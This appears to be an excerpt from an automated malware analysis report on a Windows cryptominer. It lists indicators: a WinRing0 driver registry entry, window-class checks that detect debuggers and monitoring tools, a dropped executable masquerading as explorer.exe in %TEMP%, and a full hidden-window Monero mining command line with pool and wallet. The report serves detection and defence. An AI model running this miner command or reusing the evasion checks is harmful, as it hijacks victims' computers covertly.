Technical Information
- [<HKLM>\System\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '%TEMP%\WinRing0x64.sys'
- ClassName: 'OLLYDBG', WindowName: ''
- ClassName: 'GBDYLLO', WindowName: ''
- ClassName: 'pediy06', WindowName: ''
- ClassName: 'FilemonClass', WindowName: ''
- ClassName: '', WindowName: 'File Monitor - Sysinternals: www.sysinternals.com'
- ClassName: 'PROCMON_WINDOW_CLASS', WindowName: ''
- ClassName: '', WindowName: 'Process Monitor - Sysinternals: www.sysinternals.com'
- ClassName: 'RegmonClass', WindowName: ''
- ClassName: '', WindowName: 'Registry Monitor - Sysinternals: www.sysinternals.com'
- %TEMP%\explorer.exe
- 'gu##.##neroocean.stream':10004
- DNS ASK gu##.##neroocean.stream
- ClassName: '18467-41' WindowName: ''
- '%TEMP%\explorer.exe' -a rx/0 -o gulf.moneroocean.stream:10004 -u 46NSwM3R891HGkmfkPQLs7dVjpfzXy9QagQnkKv5y32K1YAqJPCgRxXRSq2TUp7bLAV2cTKoDD2h47NpLY6UZ3B69G4qC9w -p x -t 1 --donate-level=1
- '%TEMP%\explorer.exe' -a rx/0 -o gulf.moneroocean.stream:10004 -u 46NSwM3R891HGkmfkPQLs7dVjpfzXy9QagQnkKv5y32K1YAqJPCgRxXRSq2TUp7bLAV2cTKoDD2h47NpLY6UZ3B69G4qC9w -p x -t 1 --donate-level=1' (with hidden window)